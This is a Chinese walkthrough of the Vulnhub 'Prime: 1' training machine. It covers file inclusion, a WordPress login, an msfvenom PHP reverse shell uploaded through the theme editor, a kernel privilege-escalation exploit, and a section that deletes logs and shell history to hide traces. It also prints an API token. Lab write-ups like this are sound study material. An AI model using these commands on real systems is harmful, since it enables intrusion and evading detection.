Vulnhub | 实战靶场渗透测试 - PRIME: 1
0x00 免责声明
本文仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!
0x01 前言
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
0x02 环境说明
| 攻击机:Kali linux(192.168.239.128) |
| 靶机:Prime1(192.168.239.129) |
| 项目地址:https://www.vulnhub.com/entry/prime-1,358 |
靶机显示内容
文中使用 Kali linux 2022.1 系统在虚拟机 NAT 网络的环境下进行示范。演示过程中使用到的工具均在 Kali 系统中自带安装。关于靶场环境可以访问项目地址进行下载学习。
0x03 端口扫描
Ⅰ使用 arp-scan 命令扫描局域网主机,发现目标端口为 192.168.239.129 。这里的主机发现主要是通过排除法进行的,其中 1、2、254 都是已知设备。
arp-scan -l
Ⅱ使用 nmap 命令查看目标端口和服务的开放情况,发现开放 22ssh 端口和 80http 端口, 22 端口和 80 端口一般都是爆破和漏洞利用两个点。
nmap -p 1-65535 -A 192.168.239.129
0x04 目录扫描
Ⅰ浏览器访问目标 IP ,靶场设计者就给了一个图片,有可能在图片中可以找到一些重要信息,这里先记录一下,如果最后实在没有思路的时候就尝试一下。首先检查了网页源代码并没有可用信息。
Ⅱ使用 dirb 对目标站点的目录扫描看看,结果发现 dev 和 index.php 目录以及一些其他目录文件。
dirb http://192.168.239.129/
Ⅲ浏览器访问 dev 目录发现一段提示。
翻译内容:
你好,
你现在处于 0 级阶段。
在真实的环境中,我们应该使用工具不断尝试挖掘漏洞。
加油,黑客。
0x05 指纹识别
Ⅰ使用 cmseek 工具对刚刚目录扫描出来的后台系统进行指纹信息收集。
cmseek -u http://192.168.239.129/wordpress
0x06 后缀扫描
Ⅰ对网页进行后缀扫描,检查此网页是否存在源代码泄露,发现网站存在几个泄露文件。
dirb http://192.168.239.129 -X .html,.zip,.txt,.php,.tmp,.rar,.tgz,.tar,.git,.svn,.bak,.doc,.docx,.xls,.xlsx,.PPTX,.PDF,.jpg,.png,.GIF,.jar
Ⅱ使用浏览器访问前面几个泄露文件,检查发现并没有什么可用信息。当访问最后一个文件时,发现第二个提示。
翻译内容:
看来,你发现了一些秘密。
那么,我就给你一点提示。
在你找到的 php 的每一页上尝试使用 fuzz 。
如果找到任何正确的参数,那么你可以继续探索。
如果仍然卡在此处,那么你应该学习一下对 OSCP 的使用。
//看到了 location.txt 那你就可以继续探索//
0x07 模糊测试
Ⅰ使用 fuzz 查找 image.php 中的参数,因为在刚刚的后缀扫描中我们分别扫出了 image.php 和 index.php 文件,那么我们要将两个文件都进行模糊测试。避免错过重要信息。
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.239.129/image.php?FUZZ
Ⅱ对参数进行过滤,过滤行数、字和字符均未发现可用的有效信息,过滤方法是将表格中的 Lines 和 Word 以及 Chars 的相同信息进行屏蔽。
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 12 --hh 147 http://192.168.239.129/image.php?FUZZ
Ⅲ再次使用 fuzz 查找 index.php 中的参数,对参数进行过滤,发现可用参数 "file" ,猜测页面可能存在文件包含漏洞。
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 12 --hh 147 http://192.168.239.129/index.php?FUZZ
0x08 文件包含漏洞
Ⅰ使用浏览器查看账户信息测试一下参数,测试了 common.txt 和 phpinfo.php 以及一些刚刚扫描到的目录信息等均显示此页面。说明存在文件包含漏洞,注意在网页下方有一处提示,说明还有一个文件可以获取到有用的信息。
翻译内容:
做的很好,
你打开的文件是错的。
渗透测试常见敏感信息路径:
| 路径地址 | 路径描述 |
| /etc/passwd | 账户信息文件 |
| /etc/shadow | 账户密码文件 |
| /usr/local/app/php5/lib/php.ini | PHP相关配置文件 |
| /etc/httpd/conf/httpd.conf | Apache配置文件 |
| /usr/local/app/apache2/conf/httpd.conf | Apache2默认配置文件 |
| /usr/local/app/apache2/conf/extra/httpd-vhost.conf | 虚拟网站配置文件 |
| /etc/my.conf | mysql 配置文件 |
Ⅱ根据网页提示说打开的文件是错误的,那么肯定还有一个文件没有访问到,也许这个文件中存在着重要信息。但是这个文件目前还不能确定是不是已经收集到的信息,所以先对收集到的信息做一个简单的梳理。通过检查获取到的信息发现在第二处提示的时候告诉我们 "看到了 location.txt 那你就可以继续探索" 。
Ⅲ根据提示信息二给出的思路将访问路径更改为 location.txt 进行访问,结果发现新的提示,告诉我们在 php 页面中使用 secrettier360 参数会有新发现。
翻译内容:
不错,现在你知道正确的参数了,
现在对下一个在进行进行挖掘,
在其他 php 页面上使用 secrettier360 参数可以获得更多乐趣。
Ⅳ分别使用 index.php 文件和 image.php 文件通过 file 查看 secrettier360 参数到底有什么。
翻译内容:
最后,你得到了正确的参数
Ⅴ使用 fuzz 测试一下 secrettier360 看看能不能有新的发现,这里在对 index.php 进行模糊测试时并未过滤出有效信息。但是之前在执行后缀扫描时还有一个 image.php 没有使用到,这里检查一下这个文件,看看是否可以获取到有效信息。
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.239.129/image.php?secrettier360=FUZZ
Ⅵ进行过滤查找,发现可用参数 "dev" 。
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 17 --hh 197 http://192.168.239.129/image.php?secrettier360=FUZZ
Ⅶ使用获得的参数对浏览器访问,发现一处新的提示,也许这就是作者要将新发现藏在 image 文件中的原因吧。
翻译内容:
最后,你得到了正确的参数
你好,你现在处于 0 级阶段。在真实的环境中,我们应该使用工具不断尝试挖掘漏洞。加油,黑客。
Ⅷ提示说已经正确了,那么我们可以通过检查常见的敏感信息路径,判断目标站点是否存在敏感信息泄露,从而发现目标的泄露信息。在上文中有对渗透测试常见敏感信息路径做一个简要的汇总,如有需要可以回顾上文进行查看。
curl http://192.168.239.129/image.php?secrettier360=/etc/passwd
Ⅸ将代码拖入编译器可以方便审查,在检查过程中,发现在 /home/saket 路径中有一个关于 password.txt 的文件。
find password.txt file in my directory:/home/saket
Ⅹ在浏览器中访问 /home/saket 路径,检查一下这个 txt 文件看看是否有密码数据。发现一个提示,还是说得到了正确的参数,但是后面一句是 follow_the_ippsec 。
翻译内容:
最后,你得到了正确的参数
follow_the_ippsec
0x09 后台登录
Ⅰ在刚才的信息收集时,目标站点还有一个 wordpress 博客管理系统,但是我一直没有访问这个系统。直到刚刚拿到了一个信息是 "follow_the_ippsec" ,才发现这个可能是登录的密码。使用浏览器访问 wordpress ,在页面中查看到一个用户名为 victor 。
Ⅱ通过获得的密码,尝试登录 wordpress ,结果可以成功登录系统后台。
0x10 漏洞扫描
Ⅰ利用漏扫工具扫描 wordpress 查看是否存在漏洞,发现漏洞挺多,其中有一个标题为: WordPress 5.2.2 - 存储评论的跨站脚本攻击(XSS) ,那么可以尝试生成一个shell文件上传到评论中。利用 xss 漏洞的特性去访问这个数据时漏洞则会执行。 wpscan 漏扫工具最后一串字符要输入自己的 API 密钥,关于 API 密钥可以在 wpscan 官网中注册获得。
wpscan --url http://192.168.239.129/wordpress --disable-tls-checks --api-token rOCN4Wxw3LdnBaPExsChadlEzbGvgd11uDUdMfqn3dg
0x11 MSF反弹Shell
Ⅰ使用 msf 创建一个 shell 文件,可以和本地 Kali 系统的 7777 端口进行连接。
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.239.128 lport=7777 -o shell.php
Ⅱ查看 shell.php 文件中的代码。
0x12 漏洞利用
Ⅰ访问主题编辑器中的 Appearance中 的 Theme Editor 。可以看到这是一个上传点。
Ⅱ找到了一个后缀是 php 的文件,那么我们可以写一个 shell 进行文件上传。
Ⅲ在上文中已经使用 msf 写了一个 shell 文件,那么直接复制粘贴即可。最后点击更新文件提升成功更新了文件。
Ⅳ使用 msfconsole 命令访问 msf 终端。
msfconsole
Ⅴ设置监听端口,建立本地 Kali 与目标计算机的远程连接。
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.239.128
set lport 7777
exploit
Ⅵ当浏览器成功访问刚刚上传的 shell 文件路径时, msf 即可成功连接。
http://192.168.239.129/wordpress/wp-content/themes/twentynineteen/secret.php
0x13 获取主机信息
Ⅰ查看目标用户 ID 信息。
getuid
Ⅱ查看目标计算机系统信息。
sysinfo
0x14 系统漏洞搜索
Ⅰ使用 msf 搜索看看 Ubuntu 16.04 系统有没有什么潜在的漏洞,在搜索中发现 Linux Kernel < 4.13.9 (ubuntu 16,04 / Fedora 27) - Local ,这个是 linux 的一个内核漏洞。我对 linux 内核安全还不够熟悉,所以去看了一些别的文章了解到可以用这个漏洞进行权限提升。
searchsploit 16.04 Ubuntu
0x15 权限提升
Ⅰ使用命令访问 45010.c 的文件路径。
cd /usr/share/exploitdb/exploits/linux/local
Ⅱ检索是否有这个文件,发现 45010.c 文件。
ls 45010*
Ⅲ复制 45010.c 文件到根目录中。
cp 45010.c ../../../../../../
Ⅳ返回到根目录查看 45010.c 文件。
cd ../
Ⅴ复制 45010.c 文件,重命名为 45010 。
gcc 45010.c -o 45010
Ⅵ上传木马文件到目标服务器中,使用 tmp 路径是因为这个路径是可以共享的。
upload /45010 /tmp/45010
Ⅶ使用 shell 命令访问目标计算机系统。
shell
Ⅷ打开 tmp 路径查看发现刚刚的木马文件成功传入目标计算机。
cd /tmp
Ⅸ使用 chmod +x 45010 命令,来执行权限提升。
chmod +x 45010
Ⅹ运行 45010 文件执行木马,获得目标系统的权限。
./45010
ⅩⅠ执行 whoami 命令显示目标计算机用户的用户名。
whoami
ⅩⅡ检查目标系统目录中发现的几个 txt 文件,至此已经完成了权限提升。
cat enc.txt
cat key.txt
cat root.txt
0x16 痕迹清理
Ⅰ使用 rm -rf 命令可以强制删除文件,后面的是一些日志路径以及指定这个日期进行删除。
rm -rf /var/run/utmp-2023-06-01 /var/log/wtmp-2023-06-01 /var/log/lastlog-2023-06-01 /var/log/btmp-2023-06-01 /var/log/auth.log-2023-06-01 /var/log/secure-2023-06-01 /var/log/maillog-2023-06-01 /var/log/message-2023-06-01 /var/log/cron-2023-06-01 /var/log/spooler-2023-06-01 /var/log/boot.log-2023-06-01
关于痕迹清理的相关命令:
| 命令 | 描述 |
| histroy -r | 删除当前会话历史记录 |
| history -c | 删除内存中的所有命令历史 |
| export HISTFILE=/dev/null export HISTSIZE=0 | 以 root 执行,可以不记录命令 |
0x17 参考文献
[1].魏钦6666. Prime(wfuzz模糊测试,CVE-2017-16695)[EB/OL]. [2023-06-01]. https://blog.csdn.net/m0_66299232/article/details/127404497?spm=1001.2014.3001.5502.
[2].红萝卜绿萝卜. 0x01--Prime_Series_Level-1靶场[EB/OL]. [2023-06-01]. https://blog.csdn.net/weixin_43742395/article/details/120323256.
[3].小孔吃不胖. Vulnhub靶场Prime_Series_Level-1渗透[EB/OL]. [2023-06-01]. https://blog.csdn.net/m0_65712192/article/details/128914895.
[4].清尘大哥. 渗透测试之痕迹清除[EB/OL]. [2023-06-01]. https://blog.csdn.net/qq_29864185/article/details/107059909.
[5].蜜罐小明哥. 安全研究 | 后渗透阶段清理痕迹方式总结[EB/OL]. [2023-06-01]. https://www.freebuf.com/articles/system/266458.html.
[6].linuxsec. 提权总结以及各种利用姿势[EB/OL]. [2023-06-01]. https://www.cnblogs.com/linuxsec/articles/11966287.html.
0x18 总结
由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。